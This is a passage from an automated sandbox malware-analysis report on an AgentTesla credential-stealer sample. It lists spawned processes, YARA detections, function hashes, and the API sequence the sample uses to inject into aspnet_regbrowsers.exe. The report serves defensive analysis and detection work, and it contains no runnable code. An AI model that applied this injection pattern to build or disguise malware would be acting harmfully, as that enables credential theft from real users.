                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.258695502.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000000.258695502.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            Reputation:low

                                                                                            Chronological Activities

                                                                                            Analysis Process: conhost.exe PID: 1768 Parent PID: 5644

                                                                                            General

                                                                                            Start time:15:00:17
                                                                                            Start date:25/11/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Chronological Activities

                                                                                            Analysis Process: aspnet_regbrowsers.exe PID: 408 Parent PID: 5644

                                                                                            General

                                                                                            Start time:15:00:19
                                                                                            Start date:25/11/2021
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            Imagebase:0xd70000
                                                                                            File size:45160 bytes
                                                                                            MD5 hash:B490A24A9328FD89155F075FA26C0DEC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.512779528.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.512779528.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.250051529.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.250051529.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            Reputation:moderate

                                                                                            Chronological Activities

                                                                                            Analysis Process: aspnet_regbrowsers.exe PID: 4896 Parent PID: 5644

                                                                                            General

                                                                                            Start time:15:00:21
                                                                                            Start date:25/11/2021
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            Imagebase:0x280000
                                                                                            File size:45160 bytes
                                                                                            MD5 hash:B490A24A9328FD89155F075FA26C0DEC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate

                                                                                            Chronological Activities

                                                                                            Analysis Process: WerFault.exe PID: 6380 Parent PID: 5644

                                                                                            General

                                                                                            Start time:15:00:28
                                                                                            Start date:25/11/2021
                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1396
                                                                                            Imagebase:0x120000
                                                                                            File size:434592 bytes
                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:high

                                                                                            Chronological Activities

                                                                                            Disassembly

                                                                                            Code Analysis

                                                                                            Reset < >

                                                                                              Analysis Process: W7UbgU8x18.exe PID: 5644 Parent PID: 6056 W7UbgU8x18.exeCOMMON

                                                                                              Executed Functions

                                                                                              Function 02721B00, Relevance: 1.3, Instructions: 1306COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 88c265adde7e366e6dd4cd0359b5505f563a8eba24c7c207440afcd89cf465c0
                                                                                              • Instruction ID: 86cae7821ff8cb08e5e0b67ffb98e32df357be2a6ea1df75301a33dbc266e659
                                                                                              • Opcode Fuzzy Hash: 88c265adde7e366e6dd4cd0359b5505f563a8eba24c7c207440afcd89cf465c0
                                                                                              • Instruction Fuzzy Hash: 13A29D3870060CABDB05AFADD81476EB6EBEFE9304F248459950B933ACDF759C029A15
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0272A090, Relevance: .8, Instructions: 842COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0387688bf3ee046bd157a79aa11a9ac159ad8f265ecdcd8d9f9b061b19207b77
                                                                                              • Instruction ID: df59f0a357aa37153c5d0c04fea59f5a0bee0de974875a4a63d2da5bb0ec76d2
                                                                                              • Opcode Fuzzy Hash: 0387688bf3ee046bd157a79aa11a9ac159ad8f265ecdcd8d9f9b061b19207b77
                                                                                              • Instruction Fuzzy Hash: 7E627F30B002188FDB18EFA5C8597AEBBF6AFC8314F149469D50AAB395DF349D458F90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02723D40, Relevance: .7, Instructions: 677COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b3199485a399c6dfbd05f00c9af027b1f50b9c4c8b84d06a27edfe3866d76150
                                                                                              • Instruction ID: 30bfb766f2553beaf34c4a4c74b24078d8c1078c860d4dcfda59e154324ffe5e
                                                                                              • Opcode Fuzzy Hash: b3199485a399c6dfbd05f00c9af027b1f50b9c4c8b84d06a27edfe3866d76150
                                                                                              • Instruction Fuzzy Hash: 32426D30B002288FDB14DBA4DC647AEB7BAAFC8305F1480A9D50AAB395DF349D458F91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02723D0F, Relevance: .6, Instructions: 607COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9b152cf88f8eb606ab47ef3c3c2478faebdb6179abbc3f8614ea65850078b47b
                                                                                              • Instruction ID: 1272b6d429320d193b38c36afa60c91289f087cf30082f6593b2f46a1a5c5d34
                                                                                              • Opcode Fuzzy Hash: 9b152cf88f8eb606ab47ef3c3c2478faebdb6179abbc3f8614ea65850078b47b
                                                                                              • Instruction Fuzzy Hash: D3325C30B002289FDB14DBA4DC687AEB7BAAFC8305F1481A9D50AEB395DF749D458F50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 027293A4, Relevance: 1.8, APIs: 1, Instructions: 267processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0272963A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 700004601df2fc0f05984eef8c77e96079b2d245fa32524556adec9421118d5d
                                                                                              • Instruction ID: cb23697422fa4dac64c237766e989cac5f834deeeb34c2e0cbaa270ca479533a
                                                                                              • Opcode Fuzzy Hash: 700004601df2fc0f05984eef8c77e96079b2d245fa32524556adec9421118d5d
                                                                                              • Instruction Fuzzy Hash: A0A12E71E00229DFDB14CFA8C8817DDBBF6BF48314F1485A9E909A7290DB749989CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 027293B0, Relevance: 1.8, APIs: 1, Instructions: 264processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0272963A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 11aedafec2fe8490dc0a2d58e83fc94e8696d2e44de1732442f77b11a394e098
                                                                                              • Instruction ID: 68241dbb5ed1147e70a61d1dbdb5d8bade6a5b822355fe32c91601845f47da68
                                                                                              • Opcode Fuzzy Hash: 11aedafec2fe8490dc0a2d58e83fc94e8696d2e44de1732442f77b11a394e098
                                                                                              • Instruction Fuzzy Hash: 62A12E71E00229DFDB14CFA8C8817DDBBF6AF48314F1485A9E909A7290DB749989CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0272E248, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0272E47E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 62fbc5aba1739122845669a5fe70c27b6c424e1fe035c7b39de9e642c0f8d80b
                                                                                              • Instruction ID: fd361f17e5ee099c0d4e3c36ef6951d434718745e6266f1809f5ba336b68064d
                                                                                              • Opcode Fuzzy Hash: 62fbc5aba1739122845669a5fe70c27b6c424e1fe035c7b39de9e642c0f8d80b
                                                                                              • Instruction Fuzzy Hash: E6915E71D10229CFDB14CFA9C9817EEBBB6BF48314F148569E809A7240DB74A989CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02729946, Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 027299D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 27e37332a16f20ea104c0b4ae98e77e58d959ada66c2fad00cb7b3ed844c3d25
                                                                                              • Instruction ID: 99cf25cd3955bd1bd5915a6d0ec4e7891e6139ff8393c7879fd7f1856e4ceb71
                                                                                              • Opcode Fuzzy Hash: 27e37332a16f20ea104c0b4ae98e77e58d959ada66c2fad00cb7b3ed844c3d25
                                                                                              • Instruction Fuzzy Hash: 3B214871900359DFCB10DFA9C8847EEBBF5FF88324F14842AE958A7240D774A944CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02729948, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 027299D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 10cc0cba5c885191909d06d86d5ab247a04b56e079fcf9966b9dec3d5c46a2c5
                                                                                              • Instruction ID: 438d37f24bdf4f6b8700f82e461bb714396cc28b09c0cd78bd4d20f184b26a8a
                                                                                              • Opcode Fuzzy Hash: 10cc0cba5c885191909d06d86d5ab247a04b56e079fcf9966b9dec3d5c46a2c5
                                                                                              • Instruction Fuzzy Hash: 04214871900359DFCB10CFA9C8847EEBBF5FF88324F14842AE958A7240D7749944CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02729788, Relevance: 1.6, APIs: 1, Instructions: 64threadinjectionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetThreadContext.KERNELBASE(?,00000000), ref: 0272980E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ContextThread
                                                                                              • String ID:
                                                                                              • API String ID: 1591575202-0
                                                                                              • Opcode ID: 19bc2b6056d753ec8bb9f4ff58bedab0f13cb6dc6775a56cd91f1be0ef51d5a8
                                                                                              • Instruction ID: fffcd9a771bbecfc32f937f358865c2ccc9a2321f5f9d954c698f44a1ac6a2e4
                                                                                              • Opcode Fuzzy Hash: 19bc2b6056d753ec8bb9f4ff58bedab0f13cb6dc6775a56cd91f1be0ef51d5a8
                                                                                              • Instruction Fuzzy Hash: 36214875D00209CFDB10DFA9C4847EEBBF5AF48228F148429D919A7240DB789944CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02729790, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetThreadContext.KERNELBASE(?,00000000), ref: 0272980E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ContextThread
                                                                                              • String ID:
                                                                                              • API String ID: 1591575202-0
                                                                                              • Opcode ID: 37d13e3308947d80d12f6ff521d2cb1bf62d67775b6383f640bb3f89ee9d4da2
                                                                                              • Instruction ID: c551680f609437e3b6362124e03d8fbb48a5d2b0cf3577a04ff435192e184e5c
                                                                                              • Opcode Fuzzy Hash: 37d13e3308947d80d12f6ff521d2cb1bf62d67775b6383f640bb3f89ee9d4da2
                                                                                              • Instruction Fuzzy Hash: 8E214971D003098FCB10DFAAC4857EEBBF4EF88228F54842AD519A7240DB78A944CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02729AE8, Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02729B5E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: d210a49036549bc146cf702c04c8fe4fdf4904f181b964fcaf3ddf573278ddfd
                                                                                              • Instruction ID: 2e4357fe043456b412cc109950b3cb71c34dbaf54a8d7911aeb2538c7761049b
                                                                                              • Opcode Fuzzy Hash: d210a49036549bc146cf702c04c8fe4fdf4904f181b964fcaf3ddf573278ddfd
                                                                                              • Instruction Fuzzy Hash: C41147719003499FCB10DFAAC8447EFBBF9EF88328F148829E519A7250C775A944DFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02729AF0, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02729B5E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 10b1ceb4a9f6f7bfa621c68ec85d54c87f402e6aafd6e7d85de97b297a1d1d86
                                                                                              • Instruction ID: 3da6fa1df1c88ac7da6450bbef8503ccd20722b4e076f88d09c39cf575e7c2ea
                                                                                              • Opcode Fuzzy Hash: 10b1ceb4a9f6f7bfa621c68ec85d54c87f402e6aafd6e7d85de97b297a1d1d86
                                                                                              • Instruction Fuzzy Hash: 3C1137719002489FCB10DFAAC844BEFBBF9EF88324F148829E519A7250C775A944DFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02729BAE, Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: fe2ad82450afa9103a20b3e6241331d178764446502b6e4419772cce27ec5100
                                                                                              • Instruction ID: 13db2a18b38191b7c04f352f51f5aafef27ef767d8b12f969322a4dd560d2f35
                                                                                              • Opcode Fuzzy Hash: fe2ad82450afa9103a20b3e6241331d178764446502b6e4419772cce27ec5100
                                                                                              • Instruction Fuzzy Hash: 39112871D00348CBDB10DFA9C4447EFFBF9AF88224F248829D519A7240C775A944CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02729BB0, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: 31437c7752cc69fc4e19d8b702a84e5cdc5ade46929e3f909aa83a7813402440
                                                                                              • Instruction ID: 9ee5ee9523b3a5ce76fbb0b41e4bcc952e177a3af076255302270b1aee678b0e
                                                                                              • Opcode Fuzzy Hash: 31437c7752cc69fc4e19d8b702a84e5cdc5ade46929e3f909aa83a7813402440
                                                                                              • Instruction Fuzzy Hash: 07112871D00348CBCB10DFA9C4447EEFBF9AF88224F148829D519A7240C775A944CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B3D3EC, Relevance: .1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302197764.0000000000B3D000.00000040.00000001.sdmp, Offset: 00B3D000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 02c91f8f544a25e4298457c61e32ed1e23119f09704e81b246797b40b30e0e42
                                                                                              • Instruction ID: e164d55a55606b32329ea58c9f8f3d5f4875c1ec7b988194ef5aee845e2d1e56
                                                                                              • Opcode Fuzzy Hash: 02c91f8f544a25e4298457c61e32ed1e23119f09704e81b246797b40b30e0e42
                                                                                              • Instruction Fuzzy Hash: 12213771500240EFCB05DF50E9C0B26BFA5FB98324F34C9A9E8490B346C336E856DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B3D4D8, Relevance: .1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302197764.0000000000B3D000.00000040.00000001.sdmp, Offset: 00B3D000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4ba165d9be571e557c640ecbb07a6e1ce2c7c4ed75928769f2487c5edf626394
                                                                                              • Instruction ID: be69266490fa138ec6f6e8a09fb05a8c3b0572661d33aed6addf00767dff3461
                                                                                              • Opcode Fuzzy Hash: 4ba165d9be571e557c640ecbb07a6e1ce2c7c4ed75928769f2487c5edf626394
                                                                                              • Instruction Fuzzy Hash: F2213A71500240EFCF05CF50E9C0B16BFE5FBA8328F3485A9D8050B256C336D855DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B3D3E7, Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302197764.0000000000B3D000.00000040.00000001.sdmp, Offset: 00B3D000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42e51dbedfba481cd5c91b0aaf319ba9b84bc14884d9ed747bd0ea32b821295d
                                                                                              • Instruction ID: 81d0b6abf91ee61874fce12ea3424e4fc3e6fdff02db9817f72bc2cdec7f2b47
                                                                                              • Opcode Fuzzy Hash: 42e51dbedfba481cd5c91b0aaf319ba9b84bc14884d9ed747bd0ea32b821295d
                                                                                              • Instruction Fuzzy Hash: 4411B176404280DFCB06CF10D9C4B16BFB2FB94320F24C6A9D8480B756C33AE856CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B3D4D3, Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302197764.0000000000B3D000.00000040.00000001.sdmp, Offset: 00B3D000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42e51dbedfba481cd5c91b0aaf319ba9b84bc14884d9ed747bd0ea32b821295d
                                                                                              • Instruction ID: 7230a5bdceefd01e4a60214934461bbfbbb4a9ef45b25f42dcb6812e96374a36
                                                                                              • Opcode Fuzzy Hash: 42e51dbedfba481cd5c91b0aaf319ba9b84bc14884d9ed747bd0ea32b821295d
                                                                                              • Instruction Fuzzy Hash: FE11B176504280CFCF16CF10D9C4B16BFB1FB98324F2486A9D8050B656C33AD856CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 027271C0, Relevance: .5, Instructions: 509COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2213801c153fce69694ff618ae5722e1eb4e916a4343a0f702c2cef2877925e1
                                                                                              • Instruction ID: d8cd42ced32d3abd08402a5c8fc645a3e00f2e6ebc069606571d29bc066ba316
                                                                                              • Opcode Fuzzy Hash: 2213801c153fce69694ff618ae5722e1eb4e916a4343a0f702c2cef2877925e1
                                                                                              • Instruction Fuzzy Hash: 49F19DB1E006688BCB15DFA9C9845ADFBF1FF88304F248669D454EB206D7349D4ACF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0272D518, Relevance: .5, Instructions: 504COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2bb2098547209749313e3083529a4b788c6980a9a3228b3bad3ba56f57af3b44
                                                                                              • Instruction ID: 91538e25b6fe5f33d80d13edf58a01ee3f9347ad574067a0fb2e14ab3aa9de49
                                                                                              • Opcode Fuzzy Hash: 2bb2098547209749313e3083529a4b788c6980a9a3228b3bad3ba56f57af3b44
                                                                                              • Instruction Fuzzy Hash: E5F18E71E046698BCB15DFA8C8846EDFBF1FF48304F248569D498EB20AD734995ACF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 027271BC, Relevance: .3, Instructions: 294COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 21a74234ee8e880749e6a12a5aadde4e40c06836398c90a688ed256f7accc005
                                                                                              • Instruction ID: f82ab2ddac87aa6d1a60e19c925a33cab3480fad78152df47246431f3f4734ea
                                                                                              • Opcode Fuzzy Hash: 21a74234ee8e880749e6a12a5aadde4e40c06836398c90a688ed256f7accc005
                                                                                              • Instruction Fuzzy Hash: A7C125B1E006298BCB14DFA9CA846EDFBF1FF48304F258569D458EB205E734995ACF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0272476B, Relevance: .2, Instructions: 181COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8ac8feedac27e5aecbc3caa1c9a4fbefff39503c2dc95aa3d1a8eaf33de29fb3
                                                                                              • Instruction ID: 799662a3e37a3065366512e318151acdce91761e100b522bae197f78ccdda0f1
                                                                                              • Opcode Fuzzy Hash: 8ac8feedac27e5aecbc3caa1c9a4fbefff39503c2dc95aa3d1a8eaf33de29fb3
                                                                                              • Instruction Fuzzy Hash: 53715A71A056048FD708EFBAF95068A7BE3EFD8305F04C8AAD1059B268FF7159058F80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02724770, Relevance: .2, Instructions: 163COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 85cbe10c5b6ceb19f78c45037574124a0cf6cb50c88dfe1b0983482a0ea056dd
                                                                                              • Instruction ID: 01209e5b803ec582cb3342dfd60d7c43f4e67d3eca783a5dd7153e3a62d41edf
                                                                                              • Opcode Fuzzy Hash: 85cbe10c5b6ceb19f78c45037574124a0cf6cb50c88dfe1b0983482a0ea056dd
                                                                                              • Instruction Fuzzy Hash: 1D614871A056048FD708EFAAF95068ABBE7EFD8304F04C8A9D1089B228FF7159058F90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Analysis Process: aspnet_regbrowsers.exe PID: 408 Parent PID: 5644 aspnet_regbrowsers.exeCOMMON

                                                                                              Executed Functions

                                                                                              Function 016B0CF0, Relevance: 2.8, APIs: 1, Instructions: 1278libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517332269.00000000016B0000.00000040.00000010.sdmp, Offset: 016B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 7c5efe0999876eb6bc1f90a99e31054607c1eda31d6c4e463b6577a7a4b972f8
                                                                                              • Instruction ID: 6f952d6e1ae10364c06ffa25237d204c326354123a703def42e5bfbbd5cad883
